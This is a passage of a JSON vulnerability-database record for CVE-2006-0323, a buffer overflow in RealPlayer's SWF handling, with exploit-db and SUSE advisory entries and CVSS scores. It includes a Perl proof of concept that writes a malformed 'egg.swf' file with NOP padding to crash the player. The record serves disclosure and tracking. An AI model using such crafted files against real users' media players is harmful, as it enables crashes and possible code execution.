$header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\";\r\n\r\nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\".\r\n\t \"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\".\r\n\t \"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\".\r\n \"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\".\r\n\t \"\\x00\\x00\\x00\";\r\n\r\n\r\nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\";\r\nprint EGG $header;\r\n\r\nfor ($i = 0; $i < 135; $i++) {\r\n$buffer.= \"\\x90\";\r\n}\r\n\r\nprint EGG $buffer;\r\nprint EGG $endheader;\r\nclose(EGG);", "sourceHref": "https://www.exploit-db.com/raw/27460", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-08T04:07:55", "description": "", "cvss3": {}, "published": "2006-03-28T00:00:00", "type": "exploitdb", "title": "RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2006-0323", "CVE-2006-0323"], "modified": "2006-03-28T00:00:00", "id": "EDB-ID:1622", "href": "https://www.exploit-db.com/exploits/1622", "sourceData": "#!/usr/bin/perl\r\n###################################################\r\n# RealPlayer: Buffer overflow vulnerability / PoC\r\n#\r\n# CVE-2006-0323\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n#\r\n# RealNetworks Advisory\r\n# http://service.real.com/realplayer/security/03162006_player/en/\r\n#\r\n# Federico L. Bossi Bonin \r\n# fbossi[at]netcomm.com.ar\r\n###################################################\r\n\r\n# Program received signal SIGSEGV, Segmentation fault.\r\n# [Switching to Thread -1218976064 (LWP 21932)]\r\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\r\n\r\nmy $EGGFILE=\"egg.swf\";\r\nmy $header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\";\r\n\r\nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\".\r\n\t \"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\".\r\n\t \"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\".\r\n \"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\".\r\n\t \"\\x00\\x00\\x00\";\r\n\r\n\r\nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\";\r\nprint EGG $header;\r\n\r\nfor ($i = 0; $i < 135; $i++) {\r\n$buffer.= \"\\x90\";\r\n}\r\n\r\nprint EGG $buffer;\r\nprint EGG $endheader;\r\nclose(EGG);\r\n\r\n# milw0rm.com [2006-03-28]", "sourceHref": "https://www.exploit-db.com/raw/1622", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2021-06-08T18:40:21", "description": "This update fixes the following security problems in Realplayer:\n#### Solution\nThere is no known workaround, please install the update packages.", "cvss3": {}, "published": "2006-03-23T12:04:47", "type": "suse", "title": "remote code execution in RealPlayer", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2005-2922", "CVE-2006-0323"], "modified": "2006-03-23T12:04:47", "id": "SUSE-SA:2006:018", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-03/msg00016.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
CVE-2006-0323
